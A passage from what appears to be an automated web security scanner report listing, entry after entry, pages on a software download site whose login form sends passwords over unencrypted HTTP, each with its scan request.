Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.195. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.196. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.197. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.198. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.199. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.200. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.201. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.202. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.203. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.204. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.205. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.206. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.207. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.208. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.209. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.210. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.211. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.212. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.213. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.214. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.215. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.216. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.217. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.218. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /a-oz-insight-1768-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.219. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.220. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.221. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.222. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.223. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.224. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.225. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.226. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.227. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.228. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.229. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.230. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.231. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.232. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.233. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.234. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.235. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.236. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.237. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.238. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.239. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
